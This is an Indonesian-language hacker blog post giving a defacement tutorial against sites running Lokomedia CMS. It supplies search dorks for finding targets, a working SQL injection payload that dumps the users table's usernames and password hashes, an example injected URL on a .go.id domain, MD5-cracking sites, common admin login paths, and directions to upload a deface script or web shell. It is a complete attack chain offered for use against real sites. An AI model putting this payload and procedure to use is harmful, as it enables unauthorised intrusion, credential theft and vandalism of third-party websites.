Label
Diposting oleh

Cara Deface Poc SQL Lokomedia


Oke Cuk Kali Ini Gua ./DarkSkull7 Bakal Ngasih Tutorial Deface Lagi:v Dan Kali Ini Tutorial Deface SQL Lokomedia, Teknik Ini Emg Jarang Di Gunakan Cuk, Padahal Ampuh Banget. oke Langsung Aja Ke Tutorial Nya

Bahan-bahan

1. Dork: inurl:/statis-1-profil.html
inurl:/statis-2-profil.html
inurl:/statis-3-profil.html


*Dikembangkan sendiri, nomor bisa dirubah kok biar dapet yg lebih fresh

2. Exploit: 'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

3. MD5 Decrypter: (https://hashkiller.co.uk/md5-decrypter.aspx)
(http://md5online.org/)

Tutorial:

1. Kalian dorking menggunakan salahsatu dork diatas














2. Pilih salahsatu target

3. Lalu kalian inject dengan menggunakan exploit tadi.

'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

http://iniweb.go.id/statis-1-profil.html
*Masukkan exploitnya setelah angka 1

Contoh: http://iniweb.go.id/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html

4. Taraa web nya berhasil terinjeksi








*Min bagaimana cara semua user pw nya terlihat? Gampang, kita view source aja

Pengguna Android: untuk pengguna android, tambahkan view-source: pada awal url
Contoh: view-source:http://iniweb.go.id/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html

Pengguna Dekstop: tekan CTRL+U

Maka hasilnya akan seperti ini.














*Disana terlihat jelas username dan password. Tetapi password nya belum di Decrypt.. kita akan Decrypt menggunakan Hashkiller














Taraaa, gw berhasil men-decrypt.. disana keluar tulisan password yang sudah di-decrypt

Jadi, kita sudah mendapatkan passwordnya
Yaitu: orientasi2018


Selanjutnya adalah

5. Cari admin login menggunakan imajinasi kalian, bisa juga menggunakan tool Website Admin Finder, oiya biasanya halaman admin terletak di: http://site.com/redaktur
Http://site.com/admin
Http://site.com/admimistrator
Http://site.com/administrators
Http://site.com/adminweb

6. Kalau sudah berhasil login, tinggal kalian up deh script deface/shell shell kalian

7. Akses shell? Kalian cari gambar yang rusak lalu tekan dan pilih Buka URL di Tab baru

Sekian tutorial Dari Gua ./DarkSkull7

Btw Gua Nitip Nick yak:* ./DarkSkull7

Posting Email
Labels:
Gua DarkSkull7 ( Dimas )

Komentar

Posting Komentar

XDarkSkull7X

Postingan Populer